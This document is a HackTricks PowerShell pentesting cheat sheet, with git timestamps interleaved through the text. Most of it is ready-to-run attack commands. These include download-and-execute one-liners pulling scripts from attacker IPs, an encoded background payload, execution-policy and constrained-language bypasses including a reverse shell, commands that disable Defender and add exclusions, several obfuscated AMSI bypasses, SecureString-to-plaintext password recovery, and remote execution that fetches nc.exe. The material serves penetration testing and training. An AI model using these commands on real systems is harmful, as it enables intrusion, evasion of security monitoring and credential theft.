2022-04-28 16:01:33 +00:00
< details >
< summary > < strong > Support HackTricks and get benefits!< / strong > < / summary >
Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
**Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo** ](https://github.com/carlospolop/hacktricks )**.**
< / details >
2022-05-01 12:49:36 +00:00
# Default PowerShell locations
2020-08-17 14:38:36 +00:00
2021-10-18 11:21:18 +00:00
```
2020-08-17 14:38:36 +00:00
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```
2022-05-01 12:49:36 +00:00
# Basic PS commands to start
2020-07-15 15:43:14 +00:00
```bash
Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full helpabout a topic
Get-Help Get-Item -Examples #List examples
Import-Module < modulepath >
Get-Command -Module < modulename >
```
2022-05-01 12:49:36 +00:00
# Download & Execute
2020-07-15 15:43:14 +00:00
```bash
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(
```
2022-05-01 12:49:36 +00:00
## Download & Execute in background with AMSI Bypass
2021-10-25 23:03:11 +00:00
```bash
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
```
2022-05-01 12:49:36 +00:00
## Using b64 from linux
2020-07-15 15:43:14 +00:00
```bash
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc < BASE64_ENCODED_PAYLOAD >
```
2022-05-01 12:49:36 +00:00
# Download
2020-07-15 15:43:14 +00:00
2022-05-01 12:49:36 +00:00
## System.Net.WebClient
2020-09-07 11:12:11 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
2020-09-05 18:39:37 +00:00
```
2022-05-01 12:49:36 +00:00
## Invoke-WebRequest
2020-09-07 11:12:11 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
2020-09-05 18:39:37 +00:00
```
2022-05-01 12:49:36 +00:00
## Wget
2020-09-07 11:12:11 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
2020-09-05 18:39:37 +00:00
```
2020-07-15 15:43:14 +00:00
2022-05-01 12:49:36 +00:00
## BitsTransfer
2020-09-07 11:12:11 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
2020-09-05 18:39:37 +00:00
# OR
2020-07-15 15:43:14 +00:00
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
2022-05-01 12:49:36 +00:00
# Base64 Kali & EncodedCommand
2020-07-15 15:43:14 +00:00
```bash
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand < Base64 >
```
2022-05-01 12:49:36 +00:00
# Execution Policy
2020-07-15 15:43:14 +00:00
By default it is set to **restricted.** Main ways to bypass this policy:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
1º Just copy and paste inside the interactive PS console
2º Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
3º Read and Exec
Get-Content .runme.ps1 | Invoke-Expression
4º Use other execution policy
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
5º Change users execution policy
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
6º Change execution policy for this session
Set-ExecutionPolicy Bypass -Scope Process
7º Download and execute:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
8º Use command switch
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
More can be found [here ](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ )
2022-05-01 12:49:36 +00:00
# Constrained language
2020-07-15 15:43:14 +00:00
```bash
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
```
2022-05-01 12:49:36 +00:00
## Bypass
2020-07-15 15:43:14 +00:00
```bash
#Easy bypass
Powershell -version 2
```
2021-10-25 23:03:11 +00:00
In current Windows that Bypass won't work but you can use[ **PSByPassCLM** ](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\\_\_31bf3856ad364e35\System.Management.Automation.dll\_ and **change the project to .Net4.5** .
2020-07-15 15:43:14 +00:00
2022-05-01 12:49:36 +00:00
### Direct bypass:
2020-07-15 15:43:14 +00:00
```bash
2020-11-10 19:35:44 +00:00
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
2020-07-15 15:43:14 +00:00
```
2022-05-01 12:49:36 +00:00
### Reverse shell:
2020-07-15 15:43:14 +00:00
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
2022-05-01 12:49:36 +00:00
# AppLockerPolicy
2020-07-15 15:43:14 +00:00
2020-07-27 17:54:30 +00:00
Check which files/extensions are blacklisted/whitelisted.
2021-10-18 11:21:18 +00:00
```
2020-07-27 17:54:30 +00:00
Get-ApplockerPolicy -Effective -xml
2020-07-15 15:43:14 +00:00
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
2020-08-17 14:38:36 +00:00
$a = Get-ApplockerPolicy -effective
$a.rulecollections
2020-07-15 15:43:14 +00:00
```
2022-05-01 12:49:36 +00:00
# Enable WinRM (Remote PS)
2020-07-15 15:43:14 +00:00
```bash
enable-psremoting -force #This enables winrm
2022-05-01 12:49:36 +00:00
# Change NetWorkConnection Category to Private
2020-07-15 15:43:14 +00:00
#Requires -RunasAdministrator
Get-NetConnectionProfile |
Where{ $_.NetWorkCategory -ne 'Private'} |
ForEach {
$_
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
}
```
2022-05-01 12:49:36 +00:00
# Antivirus
2020-07-15 15:43:14 +00:00
```bash
#Check status
Get-MpComputerStatus
#Disable
Set-MpPreference -DisableRealtimeMonitoring $true
2021-01-24 12:02:19 +00:00
#Set exclusion path
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
#Disable AMSI
"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"
2020-07-15 15:43:14 +00:00
```
2022-05-01 12:49:36 +00:00
# PS-History
2020-07-15 15:43:14 +00:00
```bash
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
```
2022-05-01 12:49:36 +00:00
# OS version and HotFixes
2020-07-15 15:43:14 +00:00
```bash
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
```
2022-05-01 12:49:36 +00:00
# Environment
2020-07-15 15:43:14 +00:00
```bash
Get-ChildItem Env: | ft Key,Value #get all values
$env:UserName @Get UserName value
```
2022-05-01 12:49:36 +00:00
# Other connected drives
2020-07-15 15:43:14 +00:00
```bash
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
```
2022-05-01 12:49:36 +00:00
## Recycle Bin
2020-07-15 15:43:14 +00:00
```bash
$shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()
```
[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/ ](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/ )
2022-05-01 12:49:36 +00:00
# Domain Recon
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="powerview.md" %}
[powerview.md ](powerview.md )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2022-05-01 12:49:36 +00:00
# Users
2020-07-15 15:43:14 +00:00
```bash
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
2022-05-01 12:49:36 +00:00
# Secure String to Plaintext
2020-07-27 17:54:30 +00:00
```bash
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
```
2020-10-28 13:38:58 +00:00
Or directly parsing form XML:
```bash
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
```
2022-05-01 12:49:36 +00:00
# SUDO
2020-07-15 15:43:14 +00:00
```bash
#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '< PASSWORD > ' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("< USERNAME > ", $pass)
2021-01-23 16:26:36 +00:00
#For local:
Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"
#For WINRM
2020-07-15 15:43:14 +00:00
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
#DOWNLOAD nc.exe
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command & {Start-Process C:\xyz\nc.bat -verb Runas}'
2020-08-17 15:37:19 +00:00
#Another method
$secpasswd = ConvertTo-SecureString "< password > " -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("< user > ", $secpasswd)
$computer = "< hostname > "
2020-07-15 15:43:14 +00:00
```
2022-05-01 12:49:36 +00:00
# Groups
2020-07-15 15:43:14 +00:00
2020-10-22 16:33:42 +00:00
```bash
2020-07-15 15:43:14 +00:00
Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
```
2022-05-01 12:49:36 +00:00
# Clipboard
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Get-Clipboard
```
2022-05-01 12:49:36 +00:00
# Processes
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
```
2022-05-01 12:49:36 +00:00
# Services
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Get-Service
```
2022-05-01 12:49:36 +00:00
# Password from secure string
2020-07-15 15:43:14 +00:00
2020-10-22 16:33:42 +00:00
```bash
2020-07-15 15:43:14 +00:00
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw)
$cred.getnetworkcredential() | fl * #Get plaintext password
```
2022-05-01 12:49:36 +00:00
# Scheduled Tasks
2020-08-17 14:38:36 +00:00
```bash
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
2022-05-01 12:49:36 +00:00
# Network
2020-07-15 15:43:14 +00:00
2022-05-01 12:49:36 +00:00
## Interfaces
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
2022-05-01 12:49:36 +00:00
## Route
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
route print
```
2022-05-01 12:49:36 +00:00
## ARP
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```
2022-05-01 12:49:36 +00:00
## Hosts
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
```
2022-05-01 12:49:36 +00:00
## Ping
2021-01-24 15:20:05 +00:00
```bash
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
```
2022-05-01 12:49:36 +00:00
## SNMP
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
2022-05-01 12:49:36 +00:00
# AMSI bypass
2020-08-17 14:38:36 +00:00
2020-11-10 09:43:37 +00:00
```bash
2022-04-27 14:07:21 +00:00
# A Method
2020-08-17 14:38:36 +00:00
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
2020-08-25 17:04:31 +00:00
2022-04-27 14:07:21 +00:00
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
2021-10-18 11:21:18 +00:00
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)
2022-04-27 14:07:21 +00:00
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
& ( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
${1}.SetValue($null,$true)
# Another Method
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$field.SetValue($null,$true)
2020-11-10 09:43:37 +00:00
# Testing for Amsi Bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass
# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html
2020-08-17 14:38:36 +00:00
```
2022-04-28 16:01:33 +00:00
< details >
< summary > < strong > Support HackTricks and get benefits!< / strong > < / summary >
Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
**Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo** ](https://github.com/carlospolop/hacktricks )**.**
< / details >